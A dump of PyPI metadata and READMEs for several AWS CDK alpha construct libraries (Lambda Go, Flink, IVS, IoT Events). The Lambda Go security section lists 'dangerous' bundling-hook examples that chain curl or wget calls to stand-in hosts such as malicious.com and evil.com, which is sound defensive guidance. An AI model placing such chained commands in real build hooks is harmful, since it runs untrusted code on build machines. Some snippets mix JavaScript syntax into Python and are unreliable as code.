2026-02-19T21:58:09.779548
aws_cdk_aws_lambda_python_alpha-2.239.0a0.tar.gz
98,256
35/41/e8355b8e49e09778aec09ab35004b31dd3494bc76ef0c05a7b101ab6b5c9/aws_cdk_aws_lambda_python_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ae4bbc3e4f30e9c866bfed5e994dfe5c
ef4c3cc6100c383a654f9886e799f6529cc69997c9ec876449a40d52307eb7c6
3541e8355b8e49e09778aec09ab35004b31dd3494bc76ef0c05a7b101ab6b5c9
null
[]
0
2.1
aws-cdk.aws-lambda-go-alpha
2.239.0a0
The CDK Construct Library for AWS Lambda in Golang
# Amazon Lambda Golang Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library provides constructs for Golang Lambda functions. To use this module you will either need to have `Go` installed (`go1.11` or later) or `Docker` installed. See [Local Bundling](#local-bundling)/[Docker Bundling](#docker-bundling) for more information. This module also requires that your Golang application is using a Go version >= 1.11 and is using [Go modules](https://golang.org/ref/mod). ## Go Function Define a `GoFunction`: ```python go.GoFunction(self, "handler", entry="lambda-app/cmd/api" ) ``` By default, if `entry` points to a directory, then the construct will assume there is a Go entry file (i.e. `main.go`). Let's look at an example Go project: ```bash lambda-app ├── cmd │   └── api │   └── main.go ├── go.mod ├── go.sum ├── pkg │   ├── auth │   │   └── auth.go │   └── middleware │   └── middleware.go └── vendor ├── github.com │   └── aws │   └── aws-lambda-go └── modules.txt ``` With the above layout I could either provide the `entry` as `lambda-app/cmd/api` or `lambda-app/cmd/api/main.go`, either will work. When the construct builds the golang binary this will be translated `go build ./cmd/api` & `go build ./cmd/api/main.go` respectively. The construct will figure out where it needs to run the `go build` command from, in this example it would be from the `lambda-app` directory. It does this by determining the [mod file path](#mod-file-path), which is explained in the next section. ### mod file path The `GoFunction` tries to automatically determine your project root, that is the root of your golang project. This is usually where the top level `go.mod` file or `vendor` folder of your project is located. When bundling in a Docker container, the `moduleDir` is used as the source (`/asset-input`) for the volume mounted in the container. The CDK will walk up parent folders starting from the current working directory until it finds a folder containing a `go.mod` file. Alternatively, you can specify the `moduleDir` prop manually. In this case you need to ensure that this path includes `entry` and any module/dependencies used by your function. Otherwise bundling will fail. ## Runtime The `GoFunction` can be used with either the `GO_1_X` runtime or the provided runtimes (`PROVIDED`/`PROVIDED_AL2`). By default it will use the `PROVIDED_AL2` runtime. The `GO_1_X` runtime does not support things like [Lambda Extensions](https://docs.aws.amazon.com/lambda/latest/dg/using-extensions.html), whereas the provided runtimes do. The [aws-lambda-go](https://github.com/aws/aws-lambda-go) library has built in support for the provided runtime as long as you name the handler `bootstrap` (which we do by default). ## Dependencies The construct will attempt to figure out how to handle the dependencies for your function. It will do this by determining whether or not you are vendoring your dependencies. It makes this determination by looking to see if there is a `vendor` folder at the [mod file path](#mod-file-path). With this information the construct can determine what commands to run. You will generally fall into two scenarios: 1. You are using vendoring (indicated by the presence of a `vendor` folder) In this case `go build` will be run with `-mod=vendor` set 2. You are not using vendoring (indicated by the absence of a `vendor` folder) If you are not vendoring then `go build` will be run without `-mod=vendor` since the default behavior is to download dependencies All other properties of `lambda.Function` are supported, see also the [AWS Lambda construct library](https://github.com/aws/aws-cdk/tree/main/packages/aws-cdk-lib/aws-lambda). ## Environment By default the following environment variables are set for you: * `GOOS=linux` * `GOARCH`: based on the target architecture of the Lambda function * `GO111MODULE=on` Use the `environment` prop to define additional environment variables when go runs: ```python go.GoFunction(self, "handler", entry="app/cmd/api", bundling=go.BundlingOptions( environment={ "HELLO": "WORLD" } ) ) ``` ## Local Bundling If `Go` is installed locally and the version is >= `go1.11` then it will be used to bundle your code in your environment. Otherwise, bundling will happen in a [Lambda compatible Docker container](https://gallery.ecr.aws/sam/build-provided.al2023) with the Docker platform based on the target architecture of the Lambda function. For macOS the recommended approach is to install `Go` as Docker volume performance is really poor. `Go` can be installed by following the [installation docs](https://golang.org/doc/install). ## Docker To force bundling in a docker container even if `Go` is available in your environment, set the `forceDockerBundling` prop to `true`. This is useful if you want to make sure that your function is built in a consistent Lambda compatible environment. Use the `buildArgs` prop to pass build arguments when building the bundling image: ```python go.GoFunction(self, "handler", entry="app/cmd/api", bundling=go.BundlingOptions( build_args={ "HTTPS_PROXY": "https://127.0.0.1:3001" } ) ) ``` Use the `bundling.dockerImage` prop to use a custom bundling image: ```python go.GoFunction(self, "handler", entry="app/cmd/api", bundling=go.BundlingOptions( docker_image=DockerImage.from_build("/path/to/Dockerfile") ) ) ``` Use the `bundling.goBuildFlags` prop to pass additional build flags to `go build`: ```python go.GoFunction(self, "handler", entry="app/cmd/api", bundling=go.BundlingOptions( go_build_flags=["-ldflags \"-s -w\""] ) ) ``` **⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used. By default this construct doesn't use any Go module proxies. This is contrary to a standard Go installation, which would use the Google proxy by default. To recreate that behavior, do the following: ```python go.GoFunction(self, "GoFunction", entry="app/cmd/api", bundling=go.BundlingOptions( go_proxies=[go.GoFunction.GOOGLE_GOPROXY, "direct"] ) ) ``` You can set additional Docker options to configure the build environment: ```python from aws_cdk import DockerVolume go.GoFunction(self, "GoFunction", entry="app/cmd/api", bundling=go.BundlingOptions( network="host", security_opt="no-new-privileges", user="user:group", volumes_from=["777f7dc92da7"], volumes=[DockerVolume(host_path="/host-path", container_path="/container-path")] ) ) ``` ## Command hooks It is possible to run additional commands by specifying the `commandHooks` prop: ```python # Run additional commands on a GoFunction via `commandHooks` property go.GoFunction(self, "handler", entry="cmd/api", bundling=go.BundlingOptions( command_hooks={ # run tests def before_bundling(self, input_dir): return ["go test ./cmd/api -v"], def after_bundling(self, input_dir, output_dir): return ["echo \"Build complete\""] } ) ) ``` The following hooks are available: * `beforeBundling`: runs before all bundling commands * `afterBundling`: runs after all bundling commands They all receive the directory containing the `go.mod` file (`inputDir`) and the directory where the bundled asset will be output (`outputDir`). They must return an array of commands to run. Commands are chained with `&&`. The commands will run in the environment in which bundling occurs: inside the container for Docker bundling or on the host OS for local bundling. ### ⚠️ Security Considerations **Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands: **Safe patterns (cross-platform):** ```python go.GoFunction(self, "SafeFunction", entry="cmd/api", bundling=go.BundlingOptions( command_hooks={ "before_bundling": () => [ 'go test ./...', // ✅ Standard Go commands work on all OS 'go mod tidy', // ✅ Go module commands 'make clean', // ✅ Build tools (if available) 'echo "Building app"', // ✅ Simple output with quotes ], "after_bundling": () => ['echo "Build complete"'] } ) ) ``` **Dangerous patterns to avoid:** *Windows-specific dangers:* ```python # ❌ Windows-specific dangers go.GoFunction(self, "UnsafeWindowsFunction", entry="cmd/api", bundling=go.BundlingOptions( command_hooks={ "before_bundling": () => [ 'go test & curl.exe malicious.com', // ❌ Command chaining with & 'echo %USERPROFILE%', // ❌ Environment variable expansion 'powershell -Command "..."', // ❌ PowerShell execution ], "after_bundling": () => [] } ) ) ``` *Unix/Linux/macOS dangers:* ```python # ❌ Unix/Linux/macOS dangers go.GoFunction(self, "UnsafeUnixFunction", entry="cmd/api", bundling=go.BundlingOptions( command_hooks={ "before_bundling": () => [ 'go test; curl malicious.com', // ❌ Command chaining with ; 'echo $(whoami)', // ❌ Command substitution 'bash -c "wget evil.com"', // ❌ Shell execution ], "after_bundling": () => [] } ) ) ``` **When using third-party constructs** that include `GoFunction`: * Review the construct's source code before use * Verify what commands it executes via `commandHooks` and `goBuildFlags` * Only use constructs from trusted publishers * Test in isolated environments first The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected. For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html). ## Security Best Practices ### Third-Party Construct Safety When using third-party CDK constructs that utilize `GoFunction`, exercise caution: 1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage 2. **Verify publishers** - Use constructs only from trusted, verified sources 3. **Pin versions** - Use exact versions to prevent supply chain attacks 4. **Isolated testing** - Test third-party constructs in sandboxed environments **Before using any third-party construct:** * Review the construct's source code on GitHub or npm * Search for `commandHooks` and `goBuildFlags` usage in the code * Verify no dangerous command patterns are present * Use exact version pinning to prevent supply chain attacks The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected. ## Additional considerations Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter. By default this parameter is set to `AssetHashType.OUTPUT` which means that the CDK will calculate the asset hash (and determine whether or not your code has changed) based on the Golang executable that is created. If you specify `AssetHashType.SOURCE`, the CDK will calculate the asset hash by looking at the folder that contains your `go.mod` file. If you are deploying a single Lambda function, or you want to redeploy all of your functions if anything changes, then `AssetHashType.SOURCE` will probably work. For example, if my app looked like this: ```bash lambda-app ├── cmd │   └── api │   └── main.go ├── go.mod ├── go.sum └── pkg    └── auth       └── auth.go ``` With this structure I would provide the `entry` as `cmd/api` which means that the CDK will determine that the protect root is `lambda-app` (it contains the `go.mod` file). Since I only have a single Lambda function, and any update to files within the `lambda-app` directory should trigger a new deploy, I could specify `AssetHashType.SOURCE`. On the other hand, if I had a project that deployed multiple Lambda functions, for example: ```bash lambda-app ├── cmd │   ├── api │   │   └── main.go │   └── anotherApi │   └── main.go ├── go.mod ├── go.sum └── pkg    ├── auth    │   └── auth.go    └── middleware    └── middleware.go ``` Then I would most likely want `AssetHashType.OUTPUT`. With `OUTPUT` the CDK will only recognize changes if the Golang executable has changed, and Go only includes dependencies that are used in the executable. So in this case if `cmd/api` used the `auth` & `middleware` packages, but `cmd/anotherApi` did not, then an update to `auth` or `middleware` would only trigger an update to the `cmd/api` Lambda Function. ## Docker based bundling in complex Docker configurations By default the input and output of Docker based bundling is handled via bind mounts. In situtations where this does not work, like Docker-in-Docker setups or when using a remote Docker socket, you can configure an alternative, but slower, variant that also works in these situations. ```python go.GoFunction(self, "GoFunction", entry="app/cmd/api", bundling=go.BundlingOptions( bundling_file_access=BundlingFileAccess.VOLUME_COPY ) ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:08.938377
aws_cdk_aws_lambda_go_alpha-2.239.0a0.tar.gz
102,266
f6/21/5c2ffa343b7065a0484beaa03e18d8c8c86bfaf366495e4266988bfd86f0/aws_cdk_aws_lambda_go_alpha-2.239.0a0.tar.gz
source
sdist
null
false
0b0bcf48cd51e4eea963c463a2a0b61e
9e9b5162d18d5f5bca9b4db904634ebc8329a3bd633fe522293509bb7e8ac7ed
f6215c2ffa343b7065a0484beaa03e18d8c8c86bfaf366495e4266988bfd86f0
null
[]
0
2.1
aws-cdk.aws-kinesisanalytics-flink-alpha
2.239.0a0
A CDK Construct Library for Kinesis Analytics Flink applications
# Kinesis Analytics Flink <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This package provides constructs for creating Kinesis Analytics Flink applications. To learn more about using using managed Flink applications, see the [AWS developer guide](https://docs.aws.amazon.com/kinesisanalytics/latest/java/). ## Creating Flink Applications To create a new Flink application, use the `Application` construct: ```python import path as path import aws_cdk.integ_tests_alpha as integ import aws_cdk as core import aws_cdk.aws_cloudwatch as cloudwatch import aws_cdk.aws_kinesisanalytics_flink_alpha as flink app = core.App() stack = core.Stack(app, "FlinkAppTest") flink_runtimes = [flink.Runtime.FLINK_1_6, flink.Runtime.FLINK_1_8, flink.Runtime.FLINK_1_11, flink.Runtime.FLINK_1_13, flink.Runtime.FLINK_1_15, flink.Runtime.FLINK_1_18, flink.Runtime.FLINK_1_19, flink.Runtime.FLINK_1_20 ] flink_runtimes.for_each((runtime) => { const flinkApp = new flink.Application(stack, `App-${runtime.value}`, { code: flink.ApplicationCode.fromAsset(path.join(__dirname, 'code-asset')), runtime: runtime, }); new cloudwatch.Alarm(stack, `Alarm-${runtime.value}`, { metric: flinkApp.metricFullRestarts(), evaluationPeriods: 1, threshold: 3, }); }) integ.IntegTest(app, "ApplicationTest", test_cases=[stack] ) ``` The `code` property can use `fromAsset` as shown above to reference a local jar file in s3 or `fromBucket` to reference a file in s3. ```python flink.Application(stack, "App", code=flink.ApplicationCode.from_bucket(bucket, file_key), runtime=flink.Runtime.FLINK_1_19 ) ``` The `propertyGroups` property provides a way of passing arbitrary runtime properties to your Flink application. You can use the aws-kinesisanalytics-runtime library to [retrieve these properties](https://docs.aws.amazon.com/kinesisanalytics/latest/java/how-properties.html#how-properties-access). ```python # bucket: s3.Bucket flink_app = flink.Application(self, "Application", property_groups={ "FlinkApplicationProperties": { "input_stream_name": "my-input-kinesis-stream", "output_stream_name": "my-output-kinesis-stream" } }, # ... runtime=flink.Runtime.FLINK_1_20, code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar") ) ``` Flink applications also have specific configuration for passing parameters when the Flink job starts. These include parameters for checkpointing, snapshotting, monitoring, and parallelism. ```python # bucket: s3.Bucket flink_app = flink.Application(self, "Application", code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar"), runtime=flink.Runtime.FLINK_1_20, checkpointing_enabled=True, # default is true checkpoint_interval=Duration.seconds(30), # default is 1 minute min_pause_between_checkpoints=Duration.seconds(10), # default is 5 seconds log_level=flink.LogLevel.ERROR, # default is INFO metrics_level=flink.MetricsLevel.PARALLELISM, # default is APPLICATION auto_scaling_enabled=False, # default is true parallelism=32, # default is 1 parallelism_per_kpu=2, # default is 1 snapshots_enabled=False, # default is true log_group=logs.LogGroup(self, "LogGroup") ) ``` Flink applications can optionally be deployed in a VPC: ```python # bucket: s3.Bucket # vpc: ec2.Vpc flink_app = flink.Application(self, "Application", code=flink.ApplicationCode.from_bucket(bucket, "my-app.jar"), runtime=flink.Runtime.FLINK_1_20, vpc=vpc ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:08.090656
aws_cdk_aws_kinesisanalytics_flink_alpha-2.239.0a0.tar.gz
117,776
e2/b3/44732e4ba52f5d0fc8de77264e8872994045bfb1d331588baee9800b2609/aws_cdk_aws_kinesisanalytics_flink_alpha-2.239.0a0.tar.gz
source
sdist
null
false
c65ddbf601b9a5e7da0866f37780cbd4
37826888de69fdabd6442b97b2107362fbcad341da0dc9eeaecb4ccfce8d5b33
e2b344732e4ba52f5d0fc8de77264e8872994045bfb1d331588baee9800b2609
null
[]
0
2.1
aws-cdk.aws-ivs-alpha
2.239.0a0
The CDK Construct Library for AWS::IVS
# AWS::IVS Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon Interactive Video Service (Amazon IVS) is a managed live streaming solution that is quick and easy to set up, and ideal for creating interactive video experiences. Send your live streams to Amazon IVS using streaming software and the service does everything you need to make low-latency live video available to any viewer around the world, letting you focus on building interactive experiences alongside the live video. You can easily customize and enhance the audience experience through the Amazon IVS player SDK and timed metadata APIs, allowing you to build a more valuable relationship with your viewers on your own websites and applications. This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. ## Channels An Amazon IVS channel stores configuration information related to your live stream. You first create a channel and then contribute video to it using the channel’s stream key to start your live stream. You can create a channel ```python my_channel = ivs.Channel(self, "Channel") ``` You can use Advanced Channel type by setting the `type` property to `ivs.ChannelType.ADVANCED_HD` or `ivs.ChannelType.ADVANCED_SD`. Additionally, when using the Advanced Channel type, you can set the `preset` property to `ivs.Preset.CONSTRAINED_BANDWIDTH_DELIVERY` or `ivs.Preset.HIGHER_BANDWIDTH_DELIVERY`. For more information, see [Amazon IVS Streaming Configuration](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/streaming-config.html). ```python my_channel = ivs.Channel(self, "myChannel", type=ivs.ChannelType.ADVANCED_HD, preset=ivs.Preset.CONSTRAINED_BANDWIDTH_DELIVERY ) ``` If you want to use RTMP ingest, set `insecureIngest` property to `true`. By default, `insecureIngest` is `false` which means using RTMPS ingest. **⚠ Note:** RTMP ingest might result in reduced security for your streams. AWS recommends that you use RTMPS for ingest, unless you have specific and verified use cases. For more information, see [Encoder Settings](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/streaming-config.html#streaming-config-settings). ```python my_rtmp_channel = ivs.Channel(self, "myRtmpChannel", type=ivs.ChannelType.STANDARD, insecure_ingest=True ) ``` ### Multitrack Video Multitrack video is a new, low-latency streaming paradigm supported by Amazon Interactive Video Service (IVS) and services that use Amazon IVS. You can use Multitrack Video by setting the `multitrackInputConfiguration` property. Multitrack Video requires both a STANDARD Channel and Fragmented Mp4. For more information, see [Amazon IVS Multitrack Video](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/multitrack-video.html). ```python ivs.Channel(self, "ChannelWithMultitrackVideo", type=ivs.ChannelType.STANDARD, container_format=ivs.ContainerFormat.FRAGMENTED_MP4, multitrack_input_configuration=ivs.MultitrackInputConfiguration( maximum_resolution=ivs.MaximumResolution.HD, policy=ivs.Policy.ALLOW ) ) ``` ### Importing an existing channel You can reference an existing channel, for example, if you need to create a stream key for an existing channel ```python my_channel = ivs.Channel.from_channel_arn(self, "Channel", my_channel_arn) ``` ## Stream Keys A Stream Key is used by a broadcast encoder to initiate a stream and identify to Amazon IVS which customer and channel the stream is for. If you are storing this value, it should be treated as if it were a password. You can create a stream key for a given channel ```python my_stream_key = my_channel.add_stream_key("StreamKey") ``` ## Private Channels Amazon IVS offers the ability to create private channels, allowing you to restrict your streams by channel or viewer. You control access to video playback by enabling playback authorization on channels and generating signed JSON Web Tokens (JWTs) for authorized playback requests. A playback token is a JWT that you sign (with a playback authorization key) and include with every playback request for a channel that has playback authorization enabled. In order for Amazon IVS to validate the token, you need to upload the public key that corresponds to the private key you use to sign the token. ```python key_pair = ivs.PlaybackKeyPair(self, "PlaybackKeyPair", public_key_material=my_public_key_pem_string ) ``` Then, when creating a channel, specify the authorized property ```python my_channel = ivs.Channel(self, "Channel", authorized=True ) ``` ## Recording Configurations An Amazon IVS Recording Configuration stores settings that specify how a channel's live streams should be recorded. You can configure video quality, thumbnail generation, and where recordings are stored in Amazon S3. For more information about IVS recording, see [IVS Auto-Record to Amazon S3 | Low-Latency Streaming](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html). You can create a recording configuration: ```python # create an S3 bucket for storing recordings recording_bucket = s3.Bucket(self, "RecordingBucket") # create a basic recording configuration recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket ) ``` ### Renditions of a Recording When you stream content to an Amazon IVS channel, auto-record-to-s3 uses the source video to generate multiple renditions. For more information, see [Discovering the Renditions of a Recording](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-recording-renditions). ```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set rendition configuration rendition_configuration=ivs.RenditionConfiguration.custom([ivs.Resolution.HD, ivs.Resolution.SD]) ) ``` ### Thumbnail Generation You can enable or disable the recording of thumbnails for a live session and modify the interval at which thumbnails are generated for the live session. Thumbnail intervals may range from 1 second to 60 seconds; by default, thumbnail recording is enabled, at an interval of 60 seconds. For more information, see [Thumbnails](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-thumbnails). ```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set thumbnail settings thumbnail_configuration=ivs.ThumbnailConfiguration.interval(ivs.Resolution.HD, [ivs.Storage.LATEST, ivs.Storage.SEQUENTIAL], Duration.seconds(30)) ) ``` ### Merge Fragmented Streams The `recordingReconnectWindow` property allows you to specify a window of time (in seconds) during which, if your stream is interrupted and a new stream is started, Amazon IVS tries to record to the same S3 prefix as the previous stream. In other words, if a broadcast disconnects and then reconnects within the specified interval, the multiple streams are considered a single broadcast and merged together. For more information, see [Merge Fragmented Streams](https://docs.aws.amazon.com/ivs/latest/LowLatencyUserGuide/record-to-s3.html#r2s3-merge-fragmented-streams). ```python # recording_bucket: s3.Bucket recording_configuration = ivs.RecordingConfiguration(self, "RecordingConfiguration", bucket=recording_bucket, # set recording reconnect window recording_reconnect_window=Duration.seconds(60) ) ``` ### Attaching Recording Configuration to a Channel To enable recording for a channel, specify the recording configuration when creating the channel: ```python # recording_configuration: ivs.RecordingConfiguration channel = ivs.Channel(self, "Channel", # set recording configuration recording_configuration=recording_configuration ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:07.332836
aws_cdk_aws_ivs_alpha-2.239.0a0.tar.gz
99,275
ce/5b/28d3de00b4408eb4df947290efd8582854cce0470a533ca41337142de11d/aws_cdk_aws_ivs_alpha-2.239.0a0.tar.gz
source
sdist
null
false
dd5ec74f093f657ebb60c0b769dabafa
f829b8b82384971d6dbbf999f4f3e98ff81bdd2ba218b6df07000312cc7c1a07
ce5b28d3de00b4408eb4df947290efd8582854cce0470a533ca41337142de11d
null
[]
0
2.1
aws-cdk.aws-iotevents-alpha
2.239.0a0
The CDK Construct Library for AWS::IoTEvents
# AWS::IoTEvents Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> AWS IoT Events enables you to monitor your equipment or device fleets for failures or changes in operation, and to trigger actions when such events occur. ## `DetectorModel` The following example creates an AWS IoT Events detector model to your stack. The detector model need a reference to at least one AWS IoT Events input. AWS IoT Events inputs enable the detector to get MQTT payload values from IoT Core rules. You can define built-in actions to use a timer or set a variable, or send data to other AWS resources. See also [@aws-cdk/aws-iotevents-actions-alpha](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-iotevents-actions-alpha-readme.html) for other actions. ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions import aws_cdk.aws_lambda as lambda_ # func: lambda.IFunction input = iotevents.Input(self, "MyInput", input_name="my_input", # optional attribute_json_paths=["payload.deviceId", "payload.temperature"] ) warm_state = iotevents.State( state_name="warm", on_enter=[iotevents.Event( event_name="test-enter-event", condition=iotevents.Expression.current_input(input), actions=[actions.LambdaInvokeAction(func)] )], on_input=[iotevents.Event( # optional event_name="test-input-event", actions=[actions.LambdaInvokeAction(func)])], on_exit=[iotevents.Event( # optional event_name="test-exit-event", actions=[actions.LambdaInvokeAction(func)])] ) cold_state = iotevents.State( state_name="cold" ) # transit to coldState when temperature is less than 15 warm_state.transition_to(cold_state, event_name="to_coldState", # optional property, default by combining the names of the States when=iotevents.Expression.lt( iotevents.Expression.input_attribute(input, "payload.temperature"), iotevents.Expression.from_string("15")), executing=[actions.LambdaInvokeAction(func)] ) # transit to warmState when temperature is greater than or equal to 15 cold_state.transition_to(warm_state, when=iotevents.Expression.gte( iotevents.Expression.input_attribute(input, "payload.temperature"), iotevents.Expression.from_string("15")) ) iotevents.DetectorModel(self, "MyDetectorModel", detector_model_name="test-detector-model", # optional description="test-detector-model-description", # optional property, default is none evaluation_method=iotevents.EventEvaluation.SERIAL, # optional property, default is iotevents.EventEvaluation.BATCH detector_key="payload.deviceId", # optional property, default is none and single detector instance will be created and all inputs will be routed to it initial_state=warm_state ) ``` To grant permissions to put messages in the input, you can use the `grantWrite()` method: ```python import aws_cdk.aws_iam as iam import aws_cdk.aws_iotevents_alpha as iotevents # grantable: iam.IGrantable input = iotevents.Input.from_input_name(self, "MyInput", "my_input") input.grant_write(grantable) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:06.485573
aws_cdk_aws_iotevents_alpha-2.239.0a0.tar.gz
93,771
99/b4/9786bc0f0a5231fcaaa5ee5ca7adbf0a2b677d908aee2a16a82bcce5edb3/aws_cdk_aws_iotevents_alpha-2.239.0a0.tar.gz
source
sdist
null
false
34aade08ea69a96726f6a74447fdbed8
827ee4b4b0e47548f2ad1f4e062a964004e0c65d7413d56ac0e950ad44c5b022
99b49786bc0f0a5231fcaaa5ee5ca7adbf0a2b677d908aee2a16a82bcce5edb3
null
[]
0
2.1
aws-cdk.aws-iotevents-actions-alpha
2.239.0a0
Receipt Detector Model actions for AWS IoT Events
# Actions for AWS::IoTEvents Detector Model <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library contains integration classes to specify actions of state events of Detector Model in `@aws-cdk/aws-iotevents-alpha`. Instances of these classes should be passed to `State` defined in `@aws-cdk/aws-iotevents-alpha` You can define built-in actions to use a timer or set a variable, or send data to other AWS resources. This library contains integration classes to use a timer or set a variable, or send data to other AWS resources. AWS IoT Events can trigger actions when it detects a specified event or transition event. Currently supported are: * Use timer * Set variable to detector instance * Invoke a Lambda function ## Use timer The code snippet below creates an Action that creates the timer with duration in seconds. ```python # Example automatically generated from non-compiling source. May contain errors. import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iotevents_actions_alpha as actions # input: iotevents.IInput state = iotevents.State( state_name="MyState", on_enter=[iotevents.Event( event_name="test-event", condition=iotevents.Expression.current_input(input), actions=[ actions.SetTimerAction("MyTimer", { "duration": cdk.Duration.seconds(60) }) ] )] ) ``` Setting duration by [IoT Events Expression](https://docs.aws.amazon.com/iotevents/latest/developerguide/iotevents-expressions.html): ```python # Example automatically generated from non-compiling source. May contain errors. actions.SetTimerAction("MyTimer", duration_expression=iotevents.Expression.input_attribute(input, "payload.durationSeconds") ) ``` And the timer can be reset and cleared. Below is an example of general [Device HeartBeat](https://docs.aws.amazon.com/iotevents/latest/developerguide/iotevents-examples-dhb.html) Detector 